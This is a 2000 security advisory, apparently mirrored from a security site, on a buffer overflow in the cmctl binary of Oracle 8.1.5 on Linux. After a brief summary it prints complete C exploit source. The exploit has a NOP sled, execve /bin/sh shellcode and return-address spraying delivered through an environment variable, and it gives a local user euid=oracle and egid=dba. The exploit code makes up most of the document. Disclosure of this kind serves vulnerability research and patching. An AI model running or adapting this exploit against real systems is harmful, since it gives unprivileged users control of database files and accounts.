[ SOURCE: http://www.secureroot.com/security/advisories/9749177057.html ]

                      WWW.PLAZASITE.COM

                  System & Security Division



   Title:     Vulnerability in cmctl in Oracle 8.1.5

    Date:     13-11-2000

Platform:     Only tested in Linux, but can be exported to others.

  Impact:     Any user gain euid=oracle & egid=dba.

  Author:     Juan Manuel Pascual (pask@plazasite.com)

  Status:     Vendor Contacted. Details Below





OVERVIEW:



    cmctl is a Connection Manager Control binary





PROBLEM SUMMARY:



    There is a buffer overflow in cmctl that can be use by local

users to obtain euid of oracle user and egid to dba. With the default

instalation oracle user owns all database files.





IMPACT:



    Any user with local access, can gain euid= oracle an egid=dba





SOLUTION:



    Maybe a chmod -s ;-)))).





STATUS:



    Vendor was contacted 13/1.1 No answers were received in last

4 days.



----------------

This vulnerability was researched by:

Juan Manuel Pascual Escriba            pask@plazasite.com







/*

Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH

6.2

and 6.1. Is possible to export to others platforms.



If someone exports this to Sparc please tell me.



synopsis: buffer overflow in cmctl

Impact:   any user gain euid=oracle and egid=dba.





Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and

others.

Thanks for your patience and time.



Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.

*/





#include <stdio.h>

#include <stdlib.h>



#define DEFAULT_OFFSET                    1

#define DEFAULT_BUFFER_SIZE             350

#define NOP                            0x90

#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl

echo $pakito"





char shellcode[] =

  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

  "\x80\xe8\xdc\xff\xff\xff/bin/sh";



unsigned long get_sp(void) {

   __asm__("movl %esp,%eax");

}



main(int argc, char *argv[]) {

  char *buff, *ptr,*name[3],environ[100],binary[120];

  long *addr_ptr, addr;

  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

  int i;





  if (argc > 1) offset  = atoi(argv[1]);

        else

                {

                printf("Use ./cmctl_start Offset\n");

                exit(1);

                }





  buff = malloc(bsize);

  addr = get_sp() - offset;

  ptr = buff;

  addr_ptr = (long *) ptr;

  for (i = 0; i < bsize; i+=4)

    *(addr_ptr++) = addr;



  for (i = 0; i < bsize/2; i++)

    buff[i] = NOP;



  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

  for (i = 0; i < strlen(shellcode); i++)

    *(ptr++) = shellcode[i];



  buff[bsize - 1] = '\0';

setenv("pakito",buff,1);



system(BINARY);

}



--





                " In God We trust, Others We monitor "



        -------------------------------------------------------------

         Juan Manuel Pascual Escribá        Administrador de Sistemas

         PlazaSite S.A.                         c/ Tomás Bretón 32-38

         08950 Esplugues de Llobregat           (Barcelona),    SPAIN

         Ph: +34 93 3717398                       Fax: +34 93 3711968

         mob: 667591142                     Email: pask@plazasite.com

        -------------------------------------------------------------